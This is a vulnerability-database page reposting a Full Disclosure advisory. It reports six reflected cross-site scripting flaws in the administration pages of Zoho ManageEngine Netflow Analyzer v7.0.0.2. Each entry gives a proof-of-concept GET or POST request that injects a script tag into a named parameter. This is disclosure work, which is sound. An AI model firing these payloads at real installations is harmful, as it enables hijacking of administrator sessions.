Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

[CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone

Related Vulnerabilities: CVE-2019-7422   CVE-2019-7423   CVE-2019-7424   CVE-2019-7425   CVE-2019-7426   CVE-2019-7427   CVE-2009-3903  
Source 
                <!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7422
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/addMailSettings.jsp" file in the gF
parameter.

2. Proof of Concept

http://localhost:8080/netflow/jspui/addMailSettings.jsp?task=mail&firstTime=true&gF=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E

Parameter
 gF

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7423
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/editProfile.jsp" file in the
userName parameter.

2. Proof of Concept

http://localhost:8080/netflow/jspui/editProfile.jsp?userName=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E

Parameter
 userName.

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7424
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/index.jsp" file in the view GET
parameter or any of these POST parameters: autorefTime, section, snapshot,
viewOpt, viewAll, view, or groupSelName. The latter is related to
CVE-2009-3903.

2. Proof of Concept

http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=%22%3E%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&grDisp=3

Parameter
 view

Via POST also is vulnerable with others parameters: autorefTime, section,
snapshot, viewOpt, viewAll, view and groupSelName.

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7425
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in
the task parameter.

2. Proof of Concept

http://localhost:8080/netflow/jspui/linkdownalertConfig.jsp?task=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E&first=true

Parameter
 task

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7426
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in
the groupDesc, groupName, groupID, or task parameter.

2. Proof of Concept

POST http://localhost:8080/netflow/jspui/groupConfiguration.jsp HTTP/1.1

moveLR=&moveRL=&clickSub=true&task=Add&flag=false&groupID=0&groupName=ddd&groupDesc=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&Submit32222=Guardar

Parameter
 groupDesc, groupName, groupID and task

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer
Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-7427
# Category: webapps

1. Description

XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in
the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in
the autorefTime or graphTypes parameter.

2. Proof of Concept

POST http://localhost:8080/netflow/jspui/NetworkSnapShot.jsp HTTP/1.1

setPerio=&firstTime=false&graphTypes=line&timeFrame=Today&autorefTime=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E

Parameter
 autorefTime and graphTypes

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started